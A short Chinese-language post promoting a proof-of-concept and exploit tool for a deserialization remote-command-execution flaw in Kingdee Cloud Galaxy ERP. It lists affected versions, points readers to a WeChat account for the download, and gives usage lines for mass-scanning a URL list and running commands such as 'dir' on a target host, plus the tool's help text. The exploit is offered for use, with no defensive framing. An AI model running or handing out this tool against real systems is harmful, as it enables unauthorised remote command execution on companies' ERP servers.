漏洞简介
由于金蝶云星空数据通信默认采用的是二进制数据格式,需要进行序列化与反序列化,在此过程中未对数据进行签名或校验,导致客户端发出的数据可被攻击者恶意篡改,写入包含恶意代码的序列化数据,达到在服务端远程命令执行的效果。
关注【Hack分享吧】公众号,回复关键字【230627】获取下载链接
该漏洞不仅存在于金蝶云星空管理中心(默认8000端口),普通应用(默认80端口)也存在类似问题。
影响范围:
6.x版本:低于6.2.1012.47.x版本:7.0.352.16 至 7.7.0.118.x版本:8.0.0.05 至 8.1.0.1110
POC&EXP使用
poc:
python .\Kingdee-erp-Unserialize-RCE.py -f .\url.txt --check -t 10
exp:
python .\Kingdee-erp-Unserialize-RCE.py -u http://host --cmd 'dir'
usage: Kingdee-erp-Unserialize-RCE.py [-h] [-u URL] [--check] [-f FILE] [-t THREAD] [-T TIMEOUT] [-o OUTPUT][-p PROXY] [--cmd CMD]optional arguments:-h, --help show this help message and exit-u URL, --url URLTarget url(e.g. http://127.0.0.1)--checkCheck if vulnerable-f FILE, --file FILE Target file(e.g. url.txt)-t THREAD, --thread THREADNumber of thread (default 5)-T TIMEOUT, --timeout TIMEOUTRequest timeout (default 3)-o OUTPUT, --output OUTPUTVuln url output file (e.g. result.txt)-p PROXY, --proxy PROXYRequest Proxy (e.g http://127.0.0.1:8080)--cmd CMD execute cmd (e.g. whoami)
如果觉得《POCEXP!金蝶云星空 Kingdee-erp-Unserialize-RCE》对你有帮助,请点赞、收藏,并留下你的观点哦!